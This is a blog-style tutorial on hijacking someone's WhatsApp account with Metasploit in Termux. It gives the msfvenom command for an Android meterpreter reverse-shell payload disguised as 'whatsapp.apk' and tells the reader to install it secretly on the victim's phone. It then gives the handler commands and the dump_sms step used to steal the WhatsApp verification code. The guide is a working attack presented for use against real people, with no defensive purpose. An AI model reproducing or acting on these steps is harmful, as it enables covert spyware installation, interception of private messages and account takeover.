HACKING WHATSAPP WITH METASPLOIT AND TERMUX


 Hack WhatsApp with termux

MONETIZE YOUR WEBSITE FROM HERE

🔅Requirements


Termux👻

Metasploit installed in it👻

Some brain👻

Patience 👻

Victim's mobile phone👻

Ability to Do something without letting others to know👻


If you are new to these things then learn more about it and how to install metasploit in termux..



After all these, lets get started!🌞



Make payload,


Open metasploit


$ msfconsole


Type the Below Commànd


msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip> R > /storage/emulated/0/whatsapp.apk


😍😍Payload successfully built!!😍😍



Now after making payload..


You will see a apk file in your files

Named as whatsapp.apk


Now send this apk to your victim's device🌞


And install the apk file..

You have to do it by yourself..


❌Don't let your victim know that you are installing something suspicious❌


After installing hide that apk file😏


Now after doing the above process

Follow the steps


1)Open metasploit console


2) Type The following Command


use exploit/multi/handler


set payload android/meterpreter/reverse_tcp


set lhost <your ip>


exploit



Done!


DON'T CLOSE TERMUX!


After this,

Clear your whatsapp data (on your original phone)


And then open whatsapp


To sign in enter your victim's number..


Then it asks for otp..


Then go to termux and type


dump_sms


You will get something as sms_dump_sjsjklblahblah


Copy that!


Then open a new session


And type


$ vim (paste that smsblahblahblah)


Search into the information and you will get the code..


Enter the code in Whatsapp


Booyah!!


Whatsapp has been hacked!

Check this awsome post

Post a Comment

0 Comments